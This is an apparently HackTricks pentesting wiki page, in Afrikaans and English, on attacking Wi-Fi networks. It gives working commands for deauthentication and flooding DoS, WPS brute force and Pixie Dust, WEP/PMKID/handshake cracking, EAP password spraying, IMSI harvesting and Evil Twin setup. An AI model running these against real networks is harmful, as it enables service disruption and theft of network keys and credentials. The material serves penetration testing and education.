Pentesting Wifi

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Wifi basiese kommando’s

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Gereedskap

Hijacker & NexMon (Android se interne Wi‑Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Voer airgeddon met docker uit

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Van: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Dit kan Evil Twin, KARMA, en Known Beacons-aanvalle uitvoer en daarna ’n phishing-sjabloon gebruik om die werklike netwerkwagwoord te bekom of sosiale netwerk-credentials te vang.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

This tool automates WPS/WEP/WPA-PSK attacks. It will automatically:

• Stel die interface in monitor mode
• Skandeer moontlike netwerke - en laat jou die slagoffer(e) kies
• If WEP - Launch WEP attacks
• Indien WPA-PSK
• Indien WPS: Pixie dust attack en die bruteforce attack (wees versigtig — die brute-force attack kan baie lank neem). Let wel dat dit nie null PIN of database/generated PINs probeer nie.
• Probeer die PMKID van die AP capture om dit te kraak
• Probeer kliënte van die AP deauthenticate om ’n handshake te capture
• If PMKID or Handshake, probeer om te bruteforce met top5000 wagwoorde.

Attacks Summary

• DoS
• Deauthentication/disassociation – Ontkoppel almal (of ’n spesifieke ESSID/Client)
• Random fake APs – Versteek netwerke, moontlike crash-scanners
• Overload AP – Probeer om die AP te laat ophou werk (gewoonlik nie baie nuttig nie)
• WIDS – Speel met die IDS
• TKIP, EAPOL – Sommige spesifieke aanvalle om sommige APs te DoS
• Cracking
• Crack WEP (verskeie gereedskap en metodes)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – Nuttig om captive portal creds te capture en/of LAN-aanvalle uit te voer
• WPA-PSK Evil Twin – Nuttig vir netwerk-aanvalle as jy die wagwoord ken
• WPA-MGT – Nuttig om maatskappy credentials te capture
• KARMA, MANA, Loud MANA, Known beacon
• + Open – Nuttig om captive portal creds te capture en/of LAN-aanvalle uit te voer
• + WPA – Nuttig om WPA handshakes te capture

Open / OWE networks quick notes

• Passive capture on open SSIDs still works with monitor mode and tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so air frames are encrypted even on “open” SSIDs. Being WPA3-based, it also enforces 802.11w PMF, which blocks spoofed deauth/disassoc frames.
• OWE authentiseer nie toetreders nie: enigiemand kan assosieer, so verify client isolation in plaas van om op bemarkingsbeloftes te vertrou. Sonder isolasie werk ARP spoofing of responder-style poisoning op die plaaslike L2 steeds.
• Evil Twin remains feasible on open/OWE SSIDs by presenting a stronger signal; PMF just removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is regained.
• Broadcast poisoning on open guest Wi-Fi easily yields creds/hashes (LLMNR/NBT-NS/mDNS). See:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

Beskrywing vanaf here:.

Deauthentication attacks, a prevalent method in Wi-Fi hacking, involve forging “management” frames to forcefully disconnect devices from a network. These ongeënkripteerde pakkette mislei kliente om te dink hulle kom van die regmatige netwerk af, waardeur aanvallers WPA handshakes kan insamel vir cracking-doeleindes of om netwerkverbindings aanhoudend te ontwrig. Hierdie taktiek, skrikwekkend in sy eenvoud, word wyd gebruik en het beduidende implikasies vir netwerksekuriteit.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 beteken deauthentication
• 1 is die aantal deauths om te stuur (jy kan meerdere stuur as jy wil); 0 beteken stuur dit deurlopend
• -a 00:14:6C:7E:40:80 is die MAC address van die access point
• -c 00:0F:B5:34:30:30 is die MAC address van die kliënt om te deauthenticate; as dit weggelaat word, word broadcast deauthentication gestuur (werk nie altyd nie)
• ath0 is die interface name

Disassociation Packets

Disassociation packets, soortgelyk aan deauthentication packets, is ’n tipe management frame wat in Wi-Fi networks gebruik word. Hierdie packets dien om die verbinding tussen ’n toestel (soos ’n laptop of smartphone) en ’n access point (AP) te verbreek. Die hoofverskil tussen disassociation en deauthentication lê in hulle gebruiksituasies. Terwyl ’n AP deauthentication packets om rogue devices eksplisiet van die netwerk te verwyder, disassociation packets word tipies gestuur wanneer die AP ’n afsluiting ondergaan, herbegin, of verhuis, wat dus die ontkoppeling van alle gekoppelde nodes vereis.

Hierdie aanval kan uitgevoer word met mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Meer DOS-aanvalle deur mdk4

In here.

ATTACK MODE b: Beacon Flooding

Stuur beacon frames om fake APs by clients te wys. Dit kan soms network scanners en selfs drivers laat crash!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

AANVALMODUS a: Authentication Denial-Of-Service

Om authentication frames na alle toeganklike Access Points (APs) binne bereik te stuur, kan hierdie APs oorlaai, veral wanneer baie kliënte betrokke is. Hierdie intense verkeer kan tot stelselinstabiliteit lei, wat veroorsaak dat sommige APs vasvries of selfs herbegin.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) kontroleer of ’n SSID behoorlik openbaar is en bevestig die AP se reikafstand. Hierdie tegniek, gekombineer met bruteforcing hidden SSIDs met of sonder ’n wordlist, help om verborge netwerke te identifiseer en toegang daartoe te verkry.

ATTACK MODE m: Michael Countermeasures Exploitation

Die stuur van willekeurige of duplikaat pakkette na verskillende QoS queues kan Michael Countermeasures op TKIP APs ontlok, wat tot ’n een-minuut lange afskakeling van die AP lei. Hierdie metode is ’n doeltreffende DoS (Denial of Service) aanvalstaktiek.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Om ’n AP te oorstroom met EAPOL Start frames skep fake sessions, oorlaai die AP en blokkeer legitieme kliënte. Alternatiewelik dwing die inspuiting van fake EAPOL Logoff messages kliënte om te ontkoppel; albei metodes ontwrig netwerkdiens doeltreffend.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Aanvalle op IEEE 802.11s mesh-netwerke

Verskeie aanvalle op skakelbestuur en routering in mesh-netwerke.

ATTACK MODE w: WIDS-verwarring

Kruis-koppeling van kliënte na verskeie WDS-node of vals rogue APs kan Intrusion Detection and Prevention Systems manipuleer, wat verwarring en potensiële misbruik van die stelsel skep.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

’n packet fuzzer met ’n verskeidenheid packet-bronne en ’n omvattende stel modifiers vir packet-manipulasie.

Airggedon

Airgeddon bied die meeste van die aanvalle wat in die vorige kommentaar voorgestel is:

WPS

WPS (Wi‑Fi Protected Setup) vereenvoudig die proses om toestelle aan ’n router te koppel, en verbeter die opstelspoed en gerief vir netwerke wat met WPA of WPA2 Personal enkripteer is. Dit is nie effektief teen die maklik gekompromitteerde WEP sekuriteit nie. WPS gebruik ’n 8-syfer PIN, gevalideer in twee halfdele, wat dit vatbaar maak vir brute-force attacks weens die beperkte aantal kombinasies (ongeveer 11 000 moontlikhede).

WPS Bruteforce

Daar is 2 hoofhulpmiddels om hierdie aksie uit te voer: Reaver en Bully.

• Reaver is ontwerp as ’n robuuste en praktiese aanval teen WPS, en is getoets teen ’n wye verskeidenheid access points en WPS-implementasies.
• Bully is ’n nuwe implementering van die WPS brute force attack, geskryf in C. Dit het verskeie voordele bo die oorspronklike reaver code: minder dependencies, verbeterde geheue- en CPU-prestasie, korrekte hantering van endianness, en ’n meer robuuste stel opsies.

Die aanval misbruik die WPS PIN se kwesbaarheid, veral die blootstelling van die eerste vier syfers en die laaste syfer se rol as ’n checksum, wat die brute-force attack vergemaklik. Verdedigings teen brute-force attacks, soos blocking MAC addresses van aggressiewe aanvallers, vereis egter MAC address rotation om die aanval voort te sit.

Sodra die WPS PIN verkry is met hulpmiddels soos Bully of Reaver, kan die aanvaller die WPA/WPA2 PSK aflei, wat volgehoue netwerktoegang verseker.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

This refined approach targets WPS PINs using known vulnerabilities:

1. Pre-discovered PINs: Gebruik ’n databasis van bekende PINs wat gekoppel is aan spesifieke vervaardigers wat geneig is om uniforme WPS PINs te gebruik. Hierdie databasis korreleer die eerste drie oktette van MAC-addresses met waarskynlike PINs vir daardie vervaardigers.
2. PIN Generation Algorithms: Maak gebruik van algoritmes soos ComputePIN en EasyBox, wat WPS PINs bereken gebaseer op die AP se MAC-address. Die Arcadyan algorithm vereis bykomend ’n device ID, wat ’n ekstra laag by die PIN-generasieproses voeg.

WPS Pixie Dust attack

Dominique Bongard het ’n fout ontdek in sommige Access Points (APs) met betrekking tot die skep van geheime kodes, bekend as nonces (E-S1 en E-S2). As hierdie nonces uitgewerk kan word, word dit maklik om die AP se WPS PIN te kraak. Die AP openbaar die PIN binne ’n spesiale kode (hash) om te bewys dat dit wettig is en nie ’n vals (rogue) AP is nie. Hierdie nonces is in wese die “sleutels” om die “kluis” wat die WPS PIN bevat oop te maak. Meer hieroor is te vinde hier.

In eenvoudige terme is die probleem dat sommige APs nie toevallig genoeg sleutels gebruik het om die PIN tydens die koppelingsproses te enkripteer nie. Dit maak die PIN vatbaar daarvoor om van buite die netwerk geraad te word (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

As jy nie die toestel na monitor mode wil skakel nie, of as reaver en bully probleme ondervind, kan jy OneShot-C probeer. Hierdie tool kan ’n Pixie Dust attack uitvoer sonder om na monitor mode te hoef te skakel.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Sommige swak ontwerpte stelsels laat selfs toe dat ’n Null PIN (’n leë of nie‑bestaande PIN) toegang verleen, wat nogal ongewoon is. Die hulpmiddel Reaver kan vir hierdie kwesbaarheid toets, in teenstelling met Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Al die voorgestelde WPS attacks kan maklik uitgevoer word met airgeddon.

• 5 en 6 laat jou jou pasgemaakte PIN probeer (as jy een het)
• 7 en 8 voer die Pixie Dust attack uit
• 13 laat jou die NULL PIN toets
• 11 en 12 sal die PINs wat verband hou met die geselekteerde AP uit beskikbare databasisse herinsamel en moontlike PINs genereer met: ComputePIN, EasyBox en opsioneel Arcadyan (aanbeveel, waarom nie?)
• 9 en 10 sal elke moontlike PIN toets

WEP

Hoekom dit in duie stort

• RC4 seed is just IV (24 bits) + shared key. Die IV is cleartext, klein (2^24), en herhaal vinnig, sodat ciphertexts met dieselfde IV die keystream hergebruik.
• XORing twee ciphertexts met dieselfde keystream leaks PlaintextA ⊕ PlaintextB; voorspelbare headers + RC4 KSA biases (FMS) laat jou sleutelbytes “stem”. PTW optimaliseer dit deur ARP traffic te gebruik om vereistes te verminder tot tienduisende pakkette in plaas van miljoene.
• Integriteit is slegs CRC32 (linear/unkeyed), dus kan ’n aanvaller bits omdraai en CRC32 herbereken sonder die sleutel → packet forgery/replay/ARP injection terwyl hy op IVs wag.

Die praktiese breek is deterministies:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon bevat steeds ’n “All-in-One” WEP-workflow as jy ’n begeleide UI verkies.

WPA/WPA2 PSK

PMKID

In 2018 het hashcat revealed ’n nuwe attack method, uniek omdat dit slegs one single packet benodig en nie vereis dat enige clients met die teiken AP verbind is nie — net interaksie tussen die attacker en die AP.

Baie moderne routers voeg ’n optional field by die first EAPOL frame tydens association, bekend as Robust Security Network. Dit sluit die PMKID in.

Soos die oorspronklike pos verduidelik, word die PMKID geskep met bekende data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Aangesien die “PMK Name” konstant is, ons die BSSID van die AP en die station ken, en die PMK identies is aan dié van ’n volledige 4-way handshake, kan hashcat hierdie inligting gebruik om die PSK te kraak en die passphrase te herkry!

Om hierdie inligting te gather en plaaslik die wagwoord te bruteforce, kan jy die volgende doen:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Die PMKIDs captured sal in die console gewys word en ook saved binne _ /tmp/attack.pcap_
Skakel nou die capture om na hashcat/john formaat en crack dit:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Neem asseblief kennis dat die formaat van ’n korrekte hash uit 4 dele bestaan, soos: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 As joune slegs 3 dele bevat, dan is dit ongeldig (die PMKID capture was nie geldig nie).

Let wel dat hcxdumptool ook capture handshakes (iets soos dit sal verskyn: MP:M1M2 RC:63258 EAPOLTIME:17091). Jy kan die handshakes transformeer na hashcat/john formaat deur cap2hccapx te gebruik.

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Ek het opgemerk dat sommige handshakes wat met hierdie tool vasgelê is nie gekraak kon word nie, selfs al is die korrekte password bekend. Ek beveel aan om handshakes ook op die tradisionele manier te vang indien moontlik, of verskeie daarvan met hierdie tool vas te lê.

Handshake vaslegging

’n aanval op WPA/WPA2 networks kan uitgevoer word deur ’n handshake vas te lê en te probeer om die password offline te crack. Hierdie proses behels die monitering van die kommunikasie van ’n spesifieke netwerk en die BSSID op ’n bepaalde channel. Hier is ’n vereenvoudigde gids:

1. Identifiseer die BSSID, channel, en ’n connected client van die teiken-netwerk.
2. Gebruik airodump-ng om die netwerkverkeer op die gespesifiseerde channel en BSSID te monitor, met die doel om ’n handshake vas te lê. Die opdrag sal soos volg lyk:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Om die kans om ’n handshake te vang te verhoog, koppel die client kortliks van die network af om ’n re-authentication af te dwing. Dit kan gedoen word met die aireplay-ng command, wat deauthentication packets na die client stuur:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that as the client deauthenticated it could try to connect to a different AP or, in other cases, to a different network.

Sodra in die airodump-ng sekere handshake-inligting verskyn, beteken dit dat die handshake vasgevang is en jy kan ophou luister:

Sodra die handshake vasgevang is, kan jy dit crack met aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Kontroleer of daar ’n handshake in die lêer is

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Indien hierdie hulpmiddel ’n onvoltooide handshake van ’n ESSID vind voordat die voltooide een gevind is, sal dit nie die geldige een opspoor nie.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Vinniger aanlyn PSK guessing via wpa_supplicant ctrl socket (no clients/PMKID)

Wanneer geen clients naby is en die AP PMKID weier, kan jy PSKs aanlyn deursoek sonder om supplicants te respawn:

• Patch wpa_supplicant.c om dur = 0; af te dwing in die auth failure backoff logic (rond ssid->auth_failures), wat die temporary-disable timer effektief uitskakel.
• Run ’n enkele daemon met ’n control socket:

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• Bedryf dit via die control interface, hergebruik dieselfde scan en network:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

’n Klein Python-lus wat socket-gebeure lees (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) kan ongeveer 100 raaiskote in ongeveer 5 minute toets sonder scan overhead. Dit is steeds lawaaierig en opspoorbaar, maar vermy per-poging prosesherstarts en backoff delays.

WPA Enterprise (MGT)

In enterprise WiFi-opstellings sal jy verskeie verifikasie-metodes teëkom, elk wat verskillende sekuriteitsvlakke en bestuursfunksies bied. Wanneer jy gereedskap soos airodump-ng gebruik om netwerkverkeer te inspekteer, mag jy identifiseerders vir hierdie verifikasie-tipes opmerk. Sommige algemene metodes sluit in:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Hierdie metode ondersteun hardware tokens en eenmalige wagwoorde binne EAP-PEAP. Anders as MSCHAPv2, gebruik dit nie ’n peer challenge nie en stuur wagwoorde in onversleutelde teks na die toegangspunt, wat ’n risiko vir downgrade-aanvalle inhou.

2. EAP-MD5 (Message Digest 5):

• Betrek die stuur van die MD5-hash van die wagwoord vanaf die kliënt. Dit word nie aanbeveel nie weens kwesbaarheid vir woordeboekaanvalle, gebrek aan bediener-verifikasie, en onmoontlikheid om sessiespesifieke WEP-sleutels te genereer.

3. EAP-TLS (Transport Layer Security):

• Benut beide kliënt- en bediener-side sertifikate vir verifikasie en kan dinamies gebruikersgebaseerde en sessiegebaseerde WEP-sleutels genereer om kommunikasie te beveilig.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Verskaf wedersydse verifikasie deur ’n geïnkripteerde tonnel, tesame met ’n metode om dinamiese, per-gebruiker, per-sessie WEP-sleutels af te lei. Dit vereis slegs bediener-side sertifikate, terwyl kliënte geloofsbriewe gebruik.

5. PEAP (Protected Extensible Authentication Protocol):

• Werk soortgelyk aan EAP deur ’n TLS-tonnel te skep vir beskermde kommunikasie. Dit laat die gebruik van swakker verifikasieprotokolle bo-op EAP toe weens die beskerming wat die tonnel bied.
• PEAP-MSCHAPv2: Gereeld na verwys as PEAP, kombineer dit die kwesbare MSCHAPv2 challenge/response-meganisme met ’n beskermende TLS-tonnel.
• PEAP-EAP-TLS (or PEAP-TLS): Soortgelyk aan EAP-TLS maar inisieer ’n TLS-tonnel voordat sertifikate uitgeruil word, wat ’n addisionele laag sekuriteit bied.

You can find more information about these authentication methods here and here.

Gebruikersnaam vaslegging

Reading https://tools.ietf.org/html/rfc3748#page-27 dit lyk asof as jy EAP gebruik die “Identity” messages ondersteun moet word, en die username in duidelike teks in die “Response Identity” messages gestuur gaan word.

Selfs as een van die veiligste verifikasiemetodes gebruik word: PEAP-EAP-TLS, is dit moontlik om die gebruikersnaam wat in die EAP-protokol gestuur word te capture. Om dit te doen, vang ’n outentiseringskommunikasie (begin airodump-ng binne ’n kanaal en wireshark in dieselfde koppelvlak) en filter die pakkette met eapol.
Binne die “Response, Identity” pakket sal die username van die kliënt verskyn.

Anonieme identiteite

Identity hiding word ondersteun deur sowel EAP-PEAP as EAP-TTLS. In die konteks van ’n WiFi-netwerk word ’n EAP-Identity versoek gewoonlik deur die toegangspunt (AP) geïnisieer tydens die assosiasieproses. Om die beskerming van gebruiker-anonimiteit te verseker, bevat die antwoord van die EAP-kliënt op die gebruiker se toestel slegs die noodsaaklike inligting wat die aanvanklike RADIUS-bediener benodig om die versoek te verwerk. Hierdie konsep word deur die volgende scenario’s geïllustreer:

• EAP-Identity = anonymous
• In hierdie scenario gebruik alle gebruikers die pseudonieme “anonymous” as hul gebruikersidentifiseerder. Die aanvanklike RADIUS-bediener funksioneer as óf ’n EAP-PEAP óf EAP-TTLS bediener, verantwoordelik vir die bestuur van die bediener-side van die PEAP of TTLS-protokol. Die innerlike (beskermde) verifikasiemetode word dan óf lokaal hanteer óf gedelegeer na ’n afgeleë (huis) RADIUS-bediener.
• EAP-Identity = anonymous@realm_x
• In hierdie situasie verberg gebruikers van verskillende realms hul identiteite terwyl hulle hul onderskeie realms aandui. Dit stel die aanvanklike RADIUS-bediener in staat om die EAP-PEAP of EAP-TTLS versoeke te proxieer na RADIUS-bedieners in hul tuisrealms, wat as die PEAP of TTLS bediener optree. Die aanvanklike RADIUS-bediener funksioneer slegs as ’n RADIUS-relay node.
• Alternatiewelik kan die aanvanklike RADIUS-bediener funksioneer as die EAP-PEAP of EAP-TTLS bediener en óf die beskermde verifikasiemetode hanteer óf dit na ’n ander bediener stuur. Hierdie opsie fasiliteer die konfigurasie van uiteenlopende beleide vir verskeie realms.

In EAP-PEAP, sodra die TLS-tonnel tussen die PEAP-bediener en die PEAP-kliënt gevestig is, inisieer die PEAP-bediener ’n EAP-Identity versoek en stuur dit deur die TLS-tonnel. Die kliënt reageer op hierdie tweede EAP-Identity versoek deur ’n EAP-Identity response te stuur wat die gebruiker se ware identiteit deur die geïnkripteerde tonnel bevat. Hierdie benadering voorkom effektief dat iemand wat die 802.11-verkeer afluister die gebruiker se werklike identiteit kan sien.

EAP-TTLS volg ’n effens ander prosedure. Met EAP-TTLS outentiseer die kliënt tipies deur PAP of CHAP, beveilig deur die TLS-tonnel. In hierdie geval sluit die kliënt ’n User-Name attribute en óf ’n Password óf CHAP-Password attribute in die aanvanklike TLS-boodskap in wat na tonnel-opstelling gestuur word.

Ongeag die gekose protokol, kry die PEAP/TTLS-bediener kennis van die gebruiker se werklike identiteit nadat die TLS-tonnel gevestig is. Die werklike identiteit kan as user@realm of eenvoudig user voorgestel word. Indien die PEAP/TTLS-bediener ook verantwoordelik is vir die verifiëring van die gebruiker, besit dit nou die gebruiker se identiteit en gaan voort met die verifikasiemetode wat deur die TLS-tonnel beskerm word. Alternatiewelik kan die PEAP/TTLS-bediener ’n nuwe RADIUS-versoek aan die gebruiker se tuis RADIUS-bediener stuur. Hierdie nuwe RADIUS-versoek laat die PEAP of TTLS-protokollaag weg. In gevalle waar die beskermde verifikasiemetode EAP is, word die innerlike EAP-boodskappe aan die tuis RADIUS-bediener gestuur sonder die EAP-PEAP of EAP-TTLS omhulsel. Die User-Name attribute van die uitgaande RADIUS-boodskap bevat die gebruiker se werklike identiteit, wat die anonymous User-Name van die inkomende RADIUS-versoek vervang. Wanneer die beskermde verifikasiemetode PAP of CHAP is (slegs deur TTLS ondersteun), word die User-Name en ander verifikasie-attribuite wat uit die TLS-lading onttrek is in die uitgaande RADIUS-boodskap ingevul, en vervang die anonymous User-Name en TTLS EAP-Message attribuite in die inkomende RADIUS-versoek.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Aantekeninge:
- Werk voor enige TLS‑tonnel as die implementering bare EAP‑SIM/AKA gebruik sonder beskermde identiteit/pseudonieme.
- Die blootgestelde waarde is ’n permanente identifiseerder wat aan die intekenaar se SIM gekoppel is; insameling maak langtermyn‑opsporing en daaropvolgende telecommisbruik moontlik.

Impak
- Privaatheid: volgehoue gebruiker-/toestel‑opsporing vanaf passiewe Wi‑Fi‑vasleggings in openbare plekke.
- Aanvanklike telecommisbruik: met die IMSI kan ’n aanvaller met SS7/Diameter‑toegang ligging navraag doen of probeer oproep/SMS‑onderskep en MFA‑diefstal uitvoer.

Mitigasies / waarna om te kyk
- Verifieer dat kliënte anonieme outer identities (pseudonieme) vir EAP‑SIM/AKA gebruik volgens 3GPP‑riglyne (bv. 3GPP TS 33.402).
- Gee voorkeur aan die tonnelering van die identiteitsfase (bv. EAP‑TTLS/PEAP wat inner EAP‑SIM/AKA dra) sodat die IMSI nooit in duidelike teks gestuur word nie.
- Packet captures van association/auth moet nooit ’n rou IMSI in EAP-Response/Identity openbaar nie.

Verwante: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

As van die kliënt verwag word om ’n **username and password** te gebruik (let wel: **EAP-TLS won't be valid** in hierdie geval), kan jy probeer om ’n **list** van **usernames** (sien volgende deel) en **passwords** te bekom en die toegang te **bruteforce** met [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

